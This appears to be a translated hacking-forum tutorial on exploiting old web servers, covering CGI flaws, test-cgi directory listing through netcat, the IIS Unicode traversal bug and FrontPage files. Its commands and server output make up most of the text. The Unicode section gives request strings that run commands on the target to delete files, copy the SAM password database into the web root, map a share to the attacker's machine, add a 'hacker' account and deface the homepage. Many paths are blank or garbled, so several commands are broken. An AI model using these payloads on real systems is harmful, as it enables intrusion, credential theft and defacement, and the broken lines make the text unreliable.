___________________________________________________________________________
☆☆
This vulnerability can keep generating temporary files in the server until the server's hard disk is slow. Anyone can do it remotely.
Use the default in cgi-bin (Visitor Administrator)
Attack method:
Submit the following request: /cgi-bin/?user=guest
___________________________________________________________________________
☆☆
This vulnerability will expose the path on its server, and when you access this page, it will display information similar to the following:
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
Can't open perl script "C:\InetPub\scripts\": No such file or
Directory
From then on, we can know that the physical path of this page is C:\InetPub\scripts\
Attack method:
Visit /cgi-bin/scripts/
___________________________________________________________________________
☆?PageServices☆
This can display a list of pages! If you are lucky, you can also get your username and password! (It's all plain text)
The method is url/?PageServices. You can try this way.
/?wp-cs-dump /?wp-ver-info /?wp-html-rend /?wp-usr-prop /?wp-ver-diff /?wp-verify-link /?wp-start-ver
/?wp-stop-ver /?wp-uncheckout
___________________________________________________________________________
☆test-cgi☆
test-cgi is also a common vulnerability. Enter:
/cgi-bin/test-cgi?\whatever
Will return:
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST =
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Do it again and enter it like this:
/
Have you seen PASSWD?
Use netcat 80 port to attack:
machine% echo "GET /cgi-bin/test-cgi?/*" | nc 80
return:
CGI/1.0 test script report:
argc is 1. argv is /\*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST =
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
The root directory is displayed! Try this:
machine% echo "GET /cgi-bin/test-cgi?*" | nc 80
return:
CGI/1.0 test script report:
argc is 1. argv is \*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune imagemap
mail-query mail-query-2 majordomo
menu post-query
query src test-cgi uptime
REMOTE_HOST =
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Shows the contents under /CGI-BIN/ directory
___________________________________________________________________________
☆unicode☆
Directory:
http://ip/msadc/..Á../..Á../..Á../winnt/system32/?/c+dir+c:\
/scripts/..Á../winnt/system32/?/c+dir+c:\
Command to create a folder
/scripts/..Á../winnt/system32/?/c+md+c:\snowspider
Delete empty folder command:
/scripts/..Á../winnt/system32/?/c+rd+c:\snowspider
Command to delete a file:
/scripts/..Á../winnt/system32/?/c+del+c:\
Copy Files
/scripts/..Á../winnt/system32/?/c+copy c:\winnt\repair\sam
._ c:\inetpub\wwwroot\
NET USE
/scripts/..Á../winnt/system32/?/c+use+i:+\\myip\temp
Change the CMD method
/scripts/..Á../winnt/system32/?/c+copy+c:\winnt\system32\
+c:\inetpub\scripts\
Then
/scripts/?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\
Display the current environment variables of the target host
/scripts/..Á../winnt/system32/?/c+set
FIND command use
For example, I want to view the contents of all asp and asa files under WEB directory d:\inetpub\wwwroot:
/scripts/..Á..\winnt/system32/?/n+/v+""+d:\inetpub\wwwroot\*.as*
Display the file content of the same file type in a certain path.
/scripts/..Á..\winnt/system32/?/n+/v+""+c:\inetpub\wwwroot\*.ht*
Add user command
Create a new user with hacker password:
/script/?/c c:\winnt\system32\ user hacker password /add
Modify the homepage
/scripts/..Á../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+
>+f:\wwwroot\xxx\
>+f:\wwwro'>/scripts/..Á../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:\wwwro
ot\xxx\
In this way, the homepage is changed to:
Hacked by hacker
12/1/2k
More unicode vulnerabilities can be found in this forum.
___________________________________________________________________________
☆_vti_inf.html☆
Description: There is a _vti_inf.html file in the root directory of the web. This file is a feature of Frontpage extention server and contains a series of
Important information about Frontpage Extention Server; and Frontpage Extention server is a web service with many vulnerabilities.
Using it, intruders may directly modify the homepage file. If you read /_vti_inf.html you will get FP extensions
and its path on the server. There are also some password files such as:
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
How to use it specifically? I enter /_vti_inf.html and then check it
Source files, how to use the discovered things?
Answer: You can take a look at:/
Take a look at: /xcb/Server/logs/access_log
Previous page12Read the full text